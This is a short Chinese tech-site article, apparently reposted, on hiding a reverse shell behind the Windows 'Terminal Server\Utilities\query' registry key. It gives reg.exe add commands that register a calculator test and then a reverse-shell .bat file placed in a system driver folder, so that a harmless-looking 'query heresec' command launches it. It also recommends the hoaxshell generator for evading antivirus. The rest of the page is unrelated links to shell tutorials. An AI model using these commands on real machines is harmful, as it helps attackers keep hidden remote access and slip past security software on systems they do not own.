用一条命令来隐藏反向Shell-电子发烧友网

用一条命令来隐藏反向Shell

From：https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径：

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态，实际上是执行此项值中的可执行文件。

添加一条，打开计算器。

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。（测试环境用的X绒，可以绕过，经测试不能绕过Windows Defender的AMSI）。

https://github.com/t3l3machus/hoaxshell

将命令写入一个bat脚本中，然后添加注册表后执行。

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec

只需执行命令query heresec即可运行反弹shell脚本。

还能怎么用，再联想一下。

声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容侵权或者其他违规问题，请联系本站处理。举报投诉

服务器

服务器

+关注

关注
12

文章
8339

浏览量
83484
Shell

Shell

+关注

关注
1

文章
358

浏览量
22985

原文标题：小技巧 | 用一条命令来隐藏反向Shell

文章出处：【微信号：菜鸟学信安，微信公众号：菜鸟学信安】欢迎添加关注！文章转载请注明出处。

基于Go语言的反弹Shell命令生成工具简介

RevShell 是一个基于Go语言的反弹Shell命令生成工具，旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Shell代码。

发表于 08-25 09:45 •523次阅读

基于Go语言的反弹<b class='flag-5'>Shell</b><b class='flag-5'>命令</b>生成工具简介

shell编程之shell是什么

。echo 是一条命令，用来输出文本字符串的。chmod +x filename编辑结束并保存后，如果要执行该脚本，必须先使其可执行：利用vi等文本编辑器编写Shell脚本的格式是固定的，如下

发表于 11-26 16:00

[分享]Linux下的Shell工作原理

提示符。一旦出现了shell提示符，就可以键入命令名称及命令所需要的参数。shell将执行这些命令

发表于 04-27 11:25

Linux下的Shell工作原理

，对超级用户（root）用“#”作提示符。一旦出现了shell提示符，就可以键入命令名称及命令所需要的参数。

发表于 04-14 10:34

Linux Shell系列教程之Shell简介和类型

（Interactive）：解释执行用户的命令，用户输入一条命令，Shell就解释执行一条。批处理（Batch）：用户事先写

发表于 08-28 13:56

Linux Shell系列教程之（十五） Shell函数简介

返回内容，如果不加，将以最后一条命令运行结果，作为返回值。 return后跟数值n(0-255)。　　二、Shell函数使用举例　　接下来我们还是通过例子来学习下Shell函数的运用。

发表于 09-07 16:46

如何从shell/命令行打包项目？

我有一个shell脚本（OSX.command shell缺省bash脚本），可以通过做一些类似的操作来清理和构建项目，我也希望能够从

发表于 10-24 12:24

linux shell命令/unix shell命令教程

linux shell命令/unix shell命令教程:为了防止未授权用户访问你的文件，可以在文件和目录上设置权限位。还可以设定文件在创建时所具有的缺省权限：这些只是整个系统安全问题

发表于 12-06 13:08 •61次下载

Shell内建命令：exit命令

1.简介 exit 命令是 Shell 内建命令，用于退出当前 Shell 进程。 2.命令格式 exit N （1）状态码 N 的范围是

发表于 02-02 10:45 •3548次阅读

Shell命令行解释器简介

Shell 是一个命令行解释器，Shell 为用户提供了与设备进行命令行交互的方式，用户通过串口、以太网、无线等方式将命令传输给具有

发表于 08-19 17:20 •2876次阅读

Linux命令行与shell脚本编写

Linux命令行与shell脚本编写

发表于 01-11 16:50 •4次下载

shell脚本本身自带的命令详解

除了以文件形式保存在/usr/bin下面的命令，shell脚本中还可以使用shell本身自带的命令，即内置命令

发表于 05-23 09:32 •713次阅读

shell脚本基本命令

Shell脚本是一种可执行文件，它包含了一组用某种特定语言编写的命令，这些命令可以被解释器（如bash）执行。以下是一些常见的shell脚本基本命令

发表于 11-08 10:08 •839次阅读

shell命令和linux命令一样吗

Shell命令和Linux命令并不完全一样。首先，Shell是一种命令行解释器，它是用来解释和执行用户输入的

发表于 11-08 10:51 •1878次阅读

linux命令和shell编程有什么联系

Linux命令和Shell编程之间存在密切的联系。首先，Shell是Linux命令行下的解释器，它提供了一个用户界面，使用户能够与Linux内核进行交互。

发表于 11-08 10:53 •538次阅读

搜索历史

用一条命令来隐藏反向Shell

评论

基于Go语言的反弹Shell命令生成工具简介

shell编程之shell是什么

[分享]Linux下的Shell工作原理

Linux下的Shell工作原理

Linux Shell系列教程之Shell简介和类型

Linux Shell系列教程之（十五） Shell函数简介

如何从shell/命令行打包项目？

linux shell命令/unix shell命令教程

Shell内建命令：exit命令

Shell命令行解释器简介

Linux命令行与shell脚本编写

shell脚本本身自带的命令详解

shell脚本基本命令

shell命令和linux命令一样吗

linux命令和shell编程有什么联系